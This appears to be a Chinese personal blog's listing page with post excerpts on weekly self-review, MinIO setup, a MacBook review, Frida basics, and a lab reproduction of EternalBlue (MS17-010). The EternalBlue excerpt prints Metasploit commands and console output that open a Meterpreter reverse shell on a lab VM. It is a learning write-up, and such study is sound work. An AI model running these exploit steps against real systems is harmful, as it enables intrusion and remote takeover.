复盘周刊#1 | 始

复盘周刊 第1次复盘 · 2025年10 月12日 这是第一次复盘周报。复盘周报是我这周写日记时的突发奇想,计划在每周的周末对本周进行一次简单的复盘。记录本周所学所想,因为个人的状态不稳定,所以质量可能会忽高忽低。但是总比不记录要好。 📖 学了什么新东西? 选择悖论 选项越多,人反而越难满足。因为选择太多会带来压力、提高期望,让人总担心错过更好的,最终导致决策疲劳或后悔。 数码排毒(Digital detox) 目的 减轻压力与焦虑:摆脱无休止的信息流和社交比较。 重拾专注力:减少频繁通知带来的干扰。 促进现实社交:将注意力从线上转移到身边的家人和朋友。 重新获得对时间的主导权:不再让科技产品占据所有碎片时间。 如何做 关闭非必要通知:在手机设置里,只保留重要通讯(如电话、短信)的通知,将社交媒体、新闻、游戏等所有推送全部关闭。你需要信息时主动去查,而不是被它打断。 创造无手机场景: 吃饭不看手机:关注当下,专注于食物,让大脑休息。 睡觉不看手机:容易上瘾,影响睡眠质量。 卫生间不带手机:缩短在卫生间的时间,避免形成坏习惯。 安排“离线时间段”:在一段时间内(比如周六周日的上午),不用手机和电脑,去做些别的事,比如运动、读书、做家务、逛公园。 优化手机环境:将手机主屏幕的App删到只剩最必要的工具(如地图、相机、通讯软件)。把容易让你沉迷的App(如社交媒体、短视频)藏进文件夹,或者直接卸载。增加使用难度能有效减少下意识点开的行为。 屏幕时间管理工具:娱乐类App设置每日使用时长限制。 用线下活动替代屏幕时间: 培养一个不需要屏幕的爱好 安排线下社交 接触自然 核心 数字排毒不是要你彻底抛弃科技,而是让你成为科技的主人,而不是奴隶。通过一些方法来重新掌控时间和注意力。 一段喜欢的的诗句 “多少事,从来急;天地转,光阴迫。一万年太久,只争朝夕。” 出自 《满江红·和郭沫若同志》 🤔 一些思考和困惑 减少了刷短视频的时长。但仍需继续努力。 英语阅读理解题我一般方法是直接读文章。如果遇到生词多的文章我做题的正确率就大幅度下降,我确实该重视做阅读题的技巧了。 我在 做饭 上花了太多时间。 投资的事情还是先放一放,一觉睡醒被腰斩了。 🎯 下周,简单点 尝试一下11 点睡,6 点起。 做饭和外卖结合,增加学习的时间。 💫 每周一句 如果你想跑步,直接去跑就好,不要总想着叫人陪你一起。当你跑到第五次、或是第二十次的时候,自然会有志同道合的人找到你。

October 12, 2025 · 1 min · Yalois

Minio的部署和使用

文章写于2025.7.20,具有时效性。 MinIO 是一款高性能、开源、兼容 Amazon S3 协议的对象存储服务,适用于存储大容量非结构化数据(如图片、视频、备份等)。该服务安装部署简单,支持单机与分布式集群模式。开源协议AGPLv3。 使用 MinIO 主要是用 S3 来备份某些应用数据,来应对 Webdav 的缺点。 安装起来很简单,我这里选择用 Docker 部署。 Docker部署minio 访问 dockerhub 的镜像minio/minio - Docker Image | Docker Hub 后台启动+端口映射,持久化映射本地目录到/data,配置用户名和密码。 docker run --name minio_server -d -p 9000:9000 -p 9001:9001 -v [这里改为本地目录]:/data -e MINIO_ROOT_USER=[用户名] -e MINIO_ROOT_PASSWORD=[密码] \ quay.io/minio/minio server /data --console-address ":9001" 使用minio 登录之后创建Buckets。下图是上传一个测试图片和思源笔记的同步测试。 minio-client(mc) 参考官方文档—>MinIO Client — MinIO Object Storage for Linux mac 下使用brew 安装命令brew install minio/stable/mc 设置myminio,mc alias set myminio http://127.0.0.1:9000 [用户名] [密码] ...

July 20, 2025 · 1 min · Yalois

使用三周MacbookAir后的简单总结

在五月月初购入了MacbookAir M4 16+512 天蓝色,国补+学生认证,在京东花了6999.20,没有翻车,后续订了一年的AppleCare+花了599。也是第一次体验到MacOs,甚是喜欢。 之前用了一年多的Ubuntu作为主力系统,现在突然转到新的系统也还好,很快就适应了,因为Mac打开终端还是熟悉的zsh,还有可以安装Homebrew来管理软件包。 虽然只有60hz刷新率,但是动画很丝滑,60hz也可以接受。 简单的总结一下我在使用过程中的问题和解决方案,以及个人觉得很好用的地方。 macbookAir替我解决的问题: 减少背包重量。 缓解续航焦虑,提升工作效率,随用随开。 屏幕刘海遮挡导致菜单栏图标显示不全 这里可以用Ice来菜单栏的收起展开 或者解决刘海,通过让刘海平行的区域都变为黑色Mac App Store 上的“Say No to Notch” 当然还有其他的方案,可以参考这个文章MacBook 刘海(Notch)增强工具推荐 桌面小组件 在AppStore可以安装iPhone和iPad的软件,我下载了不背单词、倒数日、Wakeup课程表。 这些软件的小组件放到桌面上可以说是很方便。 专业课软件如何使用? 首先是常用的开发软件,几乎都是支持多平台的。不支持的的用win11Arm虚拟机来实现。 win11Arm有兼容层能够运行x86程序。上课的时候用思科模拟器没有问题,在计算机组成原理的时候用到Quarts也能正常运行,但是下载程序到试验箱的时候,usb-blaster驱动无法安装,需要在github下载usb-blaster(arm)驱动手动安装。然后通过TypeC转USB的转接头连接到Mac,然后把USB给到win11虚拟机。 触控板or鼠标 如果接鼠标的话,很别扭,安装个Mac Mouse Fix 会习惯。 用了Mac的触控板之后,有点不想用鼠标了。。 常用软件 终端 Tabby(开源终端,好用) 虚拟机 VMware Fusion(免费,下载入口非常难找) Parallels Desktop(付费,融合模式确实好用,无缝使用windows,学生价格¥248一年标准版) UTM(基于 qemu,可以模拟其他架构,在AppStore 是要花钱赞助下载的,官网免费下载,功能一致) 安卓模拟器 BlueStacks Air (免费) MuMu模拟器官网_安卓12模拟器_网易手游模拟器(小贵) AndroidStudio 自带的模拟器,root 权限用来 frida 安卓 Docker管理 Orbstack(免费) 多设备同步 Syncthing(配合wireguard使用) 远程控制 Mac App Store 上的“Windows App” Windows远程控制软件 RSS阅读 Fluent Reader on the Mac App Store(免费,用好几年了) 剪贴板管理器 p0deje/Maccy: Lightweight clipboard manager for macOS 压缩包解压 The Unarchiver | Top Free Unarchiving Software for macOS 浏览器 Microsoft Edge(密码都存在这里,懒得换了) Arc from The Browser Company(非常优雅的浏览器) 开发 JetBrains系列(学生认证免费 Vscode 微信开发者工具(小程序一直不知道做什么,年审都没审 Github Desktop(图形化git,用不习惯hhh 笔记 Obsidian - Sharpen your thinking(yyds Notion(学生认证计划 优化使用体验 Mac Mouse Fix 优化鼠标使用 Ice 菜单栏管理 Mac App Store 上的“Say No to Notch” 隐藏屏幕刘海 共享 App Store 上的“小米互联服务” 能控制小米手机和文件互传 Better365家的产品 Better365 的产品可以说在苹果电脑上很丰富了。只列出我在用的。 ...

May 21, 2025 · 1 min · Yalois

内网渗透日记之永恒之蓝MS17-010

介绍 永恒之蓝漏洞存在于Windows SMB v1协议的处理过程中,具体是在处理SMB v1请求时发生的漏洞。攻击者可以利用该漏洞在目标系统上执行任意代码。通过扫描开放445端口的Windows机器,攻击者可以在无需用户操作的情况下,植入勒索软件、远程控制木马等恶意程序。 编号:CVE-2017-0146 微软漏洞编号:MS17-010 影响范围 Windows XP、 Windows Server 2003. Windows Vista、Windows Server 2008、 Windows 7. Windows Server2008 R2、Windows 8.1、Windows Server 2012. Windows10、Windows Server 2012 R2、Windows Server 2016 原文链接:https://blog.csdn.net/weixin_55811105/article/details/115804701 复现环境搭建 下载 Windows Server2008 R2,https://www.imsdn.cn/windows-server/windows-server-2008-r2/,然后在vmware安装。 复现 msfconsole search ms17 use exploit/windows/smb/ms17_010_eternalblue set payload set RHOSTS= set LPORTS= run/exploit search ms17 msf6 > use exploit/windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://do cs.metasploit.com/docs/using-metas ploit/basics/using-metasploit.html RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to u se for authentication. Only affect s Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 tar get machines. SMBPass no (Optional) The password for the sp ecified username SMBUser no (Optional) The username to authent icate as VERIFY_ARCH true yes Check if remote architecture match es exploit Target. Only affects Wi ndows Server 2008 R2, Windows 7, W indows Embedded Standard 7 target machines. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Serv er 2008 R2, Windows 7, Windows Emb edded Standard 7 target machines. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thre ad, process, none) LHOST 172.16.111.129 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target View the full module info with the info, or info -d command. msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.16.111.134 RHOSTS => 172.16.111.134 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 172.16.111.129:4444 [*] 172.16.111.134:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 172.16.111.134:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit) [*] 172.16.111.134:445 - Scanned 1 of 1 hosts (100% complete) [+] 172.16.111.134:445 - The target is vulnerable. [*] 172.16.111.134:445 - Connecting to target for exploitation. [+] 172.16.111.134:445 - Connection established for exploitation. [+] 172.16.111.134:445 - Target OS selected valid for OS indicated by SMB reply [*] 172.16.111.134:445 - CORE raw buffer dump (51 bytes) [*] 172.16.111.134:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 172.16.111.134:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard [*] 172.16.111.134:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac [*] 172.16.111.134:445 - 0x00000030 6b 20 31 k 1 [+] 172.16.111.134:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 172.16.111.134:445 - Trying exploit with 12 Groom Allocations. [*] 172.16.111.134:445 - Sending all but last fragment of exploit packet [*] 172.16.111.134:445 - Starting non-paged pool grooming [+] 172.16.111.134:445 - Sending SMBv2 buffers [+] 172.16.111.134:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 172.16.111.134:445 - Sending final SMBv2 buffers. [*] 172.16.111.134:445 - Sending last fragment of exploit packet! [*] 172.16.111.134:445 - Receiving response from exploit packet [+] 172.16.111.134:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 172.16.111.134:445 - Sending egg to corrupted connection. [*] 172.16.111.134:445 - Triggering free of corrupted buffer. [*] Sending stage (203846 bytes) to 172.16.111.134 [+] 172.16.111.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 172.16.111.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 172.16.111.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] Meterpreter session 1 opened (172.16.111.129:4444 -> 172.16.111.134:49178) at 2025-04-19 12:58:14 -0400 meterpreter > help 很多命令可以去使用。。。 ...

April 19, 2025 · 3 min · Yalois

安卓逆向——从0学习Frida(配合FridaLab)

一年前还是会一点的,过了这么久忘了挺多,重新学一下。写一个博客来记录,往后也可以给学弟学妹作为参考。 0.基础配置 安装配置Android模拟器 本文使用MuMu模拟器-https://mumu.163.com/。 在主页下载之后,安装打开。 在设置中打开root权限 勾选之后重启模拟器。 通过adb连接模拟器 打开文件所在位置,找到自带的adb(就不用去额外下载了) 在这里目录下打开cmd,Shift+鼠标右键进入终端。 直接在cmd调用是没有的,可以把adb加到环境变量里 添加完之后就能在cmd随时随地调用了。 Q:MuMu模拟器如何启动adb调试? A:官方文档https://mumu.163.com/help/20230214/35047_1073151.html, 从官方文档可以知道,可通过模拟器右上角菜单-问题诊断,获取ADB调试端口。 在终端执行adb connect 127.0.0.1:16385 连接成功之后就可以用adb命令来操作虚拟机了。 默认一般是16384端口,注意自己的配置。 常用的adb命令 adb devices #列出当前连接的所有设备。 adb install <path_to_apk> #将指定的APK文件安装到设备上。 adb shell #进入设备或模拟器的Linux shell环境,可以执行各种Linux命令。 adb push <本机路径> <模拟器路径> #把电脑上的文件传到模拟器上。 adb pull <模拟器路径> <本机路径> #把模拟器上的文件下载到电脑上。 adb push example.txt /sdcard/ #把当前目录的example.txt传到/sdcard/目录下。 先把模拟器打开放一边。 Frida的安装和配置 Q: 什么是Frida? A: Frida 是一款功能强大的动态代码插桩工具(Dynamic Instrumentation Toolkit),主要用于逆向工程、安全分析、漏洞挖掘以及应用程序的运行时调试。它通过注入脚本到目标进程的内存中,允许开发者和安全研究人员动态修改、监控和调试应用程序的行为,支持多种平台(Android、iOS、Windows、macOS、Linux 等)和编程语言(Java、C/C++、Objective-C、Swift、Python 等)。 ...

April 14, 2025 · 4 min · Yalois